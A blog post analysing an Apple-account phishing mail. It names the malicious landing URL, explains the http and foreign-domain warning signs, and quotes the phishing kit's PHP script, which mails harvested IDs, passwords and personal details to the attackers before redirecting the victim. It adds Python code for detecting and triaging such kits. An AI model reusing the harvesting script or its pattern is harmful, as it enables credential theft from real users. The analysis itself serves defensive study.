I was phished again a few days ago. This time I received a well-made phishing mail asking me to verify my Apple account details:
This was a targeted attack, since the email was sent directly to my Hotmail account. Viewed on the iPad, the email looks like an official email from Apple.
But viewed in Outlook the sender's address
Apple . <apple__itunes@outlook.com>
made it clear: this was a phishing attack. Apple would never send such a mail from an outlook.com account.
Fortunately, the attackers left a copy of their phishing scripts available for download on their web server. This gave me the wonderful opportunity to analyze a phishing attempt in detail.
All links in the email point to the same internet address, a server in France that the attackers compromised to cover their tracks. On it they installed a small script, ‘apple.php’, whose only job is to redirect the visitor to the malicious site. The malicious site itself is hosted by a provider in Vancouver, Canada.
The site itself is very well crafted in Apple style, but two errors in the address line
[1] http://[2]app-secure-restore.lideresrd.com/APP/ACCOU/RESET/
immediately catch the eye:
[1] Apple would never use the insecure HTTP protocol for a site where users have to enter their credentials. The standard for such applications is HTTPS.
In my opinion the protocol is the best indicator for identifying a phishing attempt.
As a rule of thumb, the use of plain HTTP for user authentication means: you are under attack! The reverse does not hold, though: a page served over HTTPS is not automatically genuine, because anyone can obtain a certificate for a domain they control, so the domain still has to be checked.
[2] Apple would never verify account data on a web server outside Apple's own domains.
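The two indicators above, the sender address and the address line of the landing page, can be checked mechanically. The following is an added example written for this analysis, not code from the original post or from the attackers' kit. The inputs are the From header and URL quoted in this post; the BRAND_DOMAINS table is an illustrative assumption for the check, not a list published by Apple. It also goes a step beyond the text by matching domains on label boundaries, so look-alike hosts such as apple.com.evil.example are rejected even when they are served over HTTPS.

```python
"""Check the two indicators the post relies on: a display name that claims a
brand while the address domain does not belong to it, and a credential page
reached over plain http or on a host outside the brand's own domains.
Added example; not code from the original post.  BRAND_DOMAINS is an
illustrative assumption for the check, not an Apple-published list."""
from __future__ import annotations

from email.utils import parseaddr
from urllib.parse import urlparse

# Assumption: domains under which a brand sends mail and hosts its sign-in pages.
BRAND_DOMAINS = {
    "apple": ("apple.com", "icloud.com"),
}


def host_belongs_to(host: str, domain: str) -> bool:
    """True if host is domain itself or a subdomain of it.  Matching on label
    boundaries rejects 'notapple.com' and 'apple.com.evil.example', both of
    which a plain substring test would accept."""
    host = host.lower().rstrip(".")
    domain = domain.lower()
    return host == domain or host.endswith("." + domain)


def under_brand(host: str, brand: str) -> bool:
    """True if host lies under any of the brand's legitimate domains."""
    return any(host_belongs_to(host, d) for d in BRAND_DOMAINS[brand])


def check_sender(from_header: str, brand: str) -> list[str]:
    """Reasons the From header looks spoofed for brand; empty list if none."""
    display_name, addr = parseaddr(from_header)
    if "@" not in addr:
        return ["From header carries no usable address"]
    sender_domain = addr.rsplit("@", 1)[1]
    findings = []
    if brand in display_name.lower() and not under_brand(sender_domain, brand):
        findings.append(
            f"display name {display_name!r} claims {brand}, "
            f"but the address domain is {sender_domain}"
        )
    return findings


def check_login_url(url: str, brand: str) -> list[str]:
    """Reasons url is no place to type brand credentials; empty list if none.
    https alone does not clear a URL: the host check still runs, since anyone
    can obtain a certificate for a domain they control."""
    parts = urlparse(url)
    host = parts.hostname or ""
    findings = []
    if parts.scheme != "https":
        findings.append(f"scheme is {parts.scheme!r}; credentials belong on https only")
    if not under_brand(host, brand):
        findings.append(f"host {host!r} is outside every {brand} domain")
    return findings


if __name__ == "__main__":
    # Inputs taken from the mail and the landing page described in this post.
    for f in check_sender("Apple . <apple__itunes@outlook.com>", "apple"):
        print("sender:", f)
    for f in check_login_url("http://app-secure-restore.lideresrd.com/APP/ACCOU/RESET/", "apple"):
        print("url:", f)
```

Run as a script it reports one finding for the sender (display name says Apple, domain is outlook.com) and two for the URL (http scheme, host outside Apple's domains), which is exactly the reasoning the post applies by eye.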
Having identified the site as malicious, we enter some rubbish and press Continue to reach the next page. Pressing Continue submits the HTML form
<form method="post" action="RESTORE/">
so that the sub-page RESTORE at
‘http://app-secure-restore.lideresrd.com/APP/ACCOU/RESET/RESTORE/’ is displayed:
Page RESTORE is generated at runtime by a PHP script. If you press Verify my Information, the same script is executed again. This time it emails [1] the data you entered to the attackers and then redirects you to finish.php [2], which forwards you on to the Apple store.
<?php
// Sender identity shown in the attackers' mailbox; the name uses non-ASCII
// look-alike characters in place of "iTunes"
$from_name = 'íΤunes';
$from_email = 'localhost';
$to_email = '<Attackers email addresses>';
$subject = 'New UK íΤunes | '.$_POST['A13'].' ';
$url_redirect = 'finish.php'; // [2] the victim is sent here once the data has been mailed
// The form posts back to this same script; field A9 being present means
// the victim pressed "Verify my Information"
if(isset($_POST) AND !empty($_POST) AND isset($_POST['A9'])){
    require_once("mail.class.php");
    $mail = new mail();
    $mail->emailto = $to_email;
    $mail->namefrom = $from_name;
    $mail->emailfrom = $from_email;
    $mail->subject = $subject;
    // Each harvested form field is appended to the mail body, one per line
    $mail->message = '';
    $mail->message .= 'CoT : '.$_POST['A5'].'
'; // payys
    $mail->message .= 'I : '.$_POST['donnee1'].'
'; //Id
    $mail->message .= 'P : '.$_POST['donnee2'].'
'; //Pass
    // .... more code
    $mail->message .= 'DRL : '.$_POST['A13'].'
'; // Sortt
    $mail->message .= 'CP : '.$_POST['A14'].'
'; // Carpas
    $mail->check = $_POST['is_valid_email'];
    $mail->send(); // [1] the harvested data leaves for the attackers' mailbox
    header('location:'.$url_redirect);
}
else{
    // First request: the else branch renders the RESTORE page (not reproduced here)
?>
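Reading the script by hand tells us which fields are harvested, where the data goes and where the victim ends up. The same triage can be done statically over the PHP source, which is useful when a kit contains dozens of such pages. The following is an added example written for this analysis, not code from the original post or from the phishing kit. The embedded source is the excerpt reproduced above, including the author's redaction of the recipient addresses; the regexes are written for the coding style of this kit (single-quoted PHP strings, `$_POST['...']` reads, a `header('location:...')` redirect) and are an assumption about that style, not a general PHP parser.

```python
"""Static triage of the credential-harvesting script above: pull the POSTed
field names, the labels under which they are mailed out, the field that
triggers the exfiltration, the mail recipient variable, included helpers and
the post-submit redirect out of the PHP source.
Added example for this analysis; it is not part of the phishing kit.  The
regexes assume this kit's style (single-quoted strings, $_POST['x'] reads,
header('location:'.$var) redirects) rather than parsing PHP in general."""
from __future__ import annotations

import re

# Constructed sample: the excerpt of the RESTORE script as reproduced on this
# page, with the recipient addresses redacted as the author left them.
KIT_SOURCE = """<?php
$from_name = 'íΤunes';
$from_email = 'localhost';
$to_email = '<Attackers email addresses>';
$subject = 'New UK íΤunes | '.$_POST['A13'].' ';
$url_redirect = 'finish.php';
if(isset($_POST) AND !empty($_POST) AND isset($_POST['A9'])){
    require_once("mail.class.php");
    $mail = new mail();
    $mail->emailto = $to_email;
    $mail->namefrom = $from_name;
    $mail->emailfrom = $from_email;
    $mail->subject = $subject;
    $mail->message = '';
    $mail->message .= 'CoT : '.$_POST['A5'].'
'; // payys
    $mail->message .= 'I : '.$_POST['donnee1'].'
'; //Id
    $mail->message .= 'P : '.$_POST['donnee2'].'
'; //Pass
    $mail->message .= 'DRL : '.$_POST['A13'].'
'; // Sortt
    $mail->message .= 'CP : '.$_POST['A14'].'
'; // Carpas
    $mail->check = $_POST['is_valid_email'];
    $mail->send();
    header('location:'.$url_redirect);
}
else{
?>
"""

# Every form field the script reads.
POST_FIELD_RE = re.compile(r"\$_POST\['(\w+)'\]")
# Fields whose presence gates the exfiltration branch.
GUARD_RE = re.compile(r"isset\(\$_POST\['(\w+)'\]\)")
# One mail-body line: label, the field it carries, and the kit author's
# trailing comment (the multi-line '\n' literal is swallowed by [^;]*;).
EXFIL_LINE_RE = re.compile(
    r"\$mail->message\s*\.=\s*'(?P<label>[^']*?)\s*:\s*'\s*\.\s*\$_POST\['(?P<field>\w+)'\]"
    r"[^;]*;[ \t]*(?://[ \t]*(?P<comment>\S+))?"
)
REQUIRE_RE = re.compile(r"require_once\(\s*[\"']([^\"']+)[\"']\s*\)")
# header('location:'.$var) tells us which variable holds the redirect target.
REDIRECT_RE = re.compile(r"header\(\s*'location:'\s*\.\s*\$(\w+)\s*\)")


def string_assignment(source: str, var: str) -> str | None:
    """Value of the first `$var = '...'` assignment, or None."""
    m = re.search(r"\$" + re.escape(var) + r"\s*=\s*'([^']*)'", source)
    return m.group(1) if m else None


def triage_kit(source: str) -> dict:
    """Summarise what the script harvests, where it sends it and where it redirects."""
    exfil = {
        m.group("field"): {"label": m.group("label"), "comment": m.group("comment")}
        for m in EXFIL_LINE_RE.finditer(source)
    }
    redirect_var = REDIRECT_RE.search(source)
    return {
        "harvested_fields": sorted(set(POST_FIELD_RE.findall(source))),
        "exfil_fields": exfil,
        "trigger_fields": sorted(set(GUARD_RE.findall(source))),
        "recipient": string_assignment(source, "to_email"),
        "helper_includes": REQUIRE_RE.findall(source),
        "redirect_after_submit": (
            string_assignment(source, redirect_var.group(1)) if redirect_var else None
        ),
    }


if __name__ == "__main__":
    for key, value in triage_kit(KIT_SOURCE).items():
        print(f"{key}: {value}")
```

On the excerpt above this yields the trigger field A9, the five mailed fields with their labels (CoT, I, P, DRL, CP) and the kit author's own comments (payys, Id, Pass, Sortt, Carpas), the helper mail.class.php, and finish.php as the redirect, which matches the walk-through of the script given in the text.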
That was a really long journey from Germany via France and Canada to Cupertino.
Take care!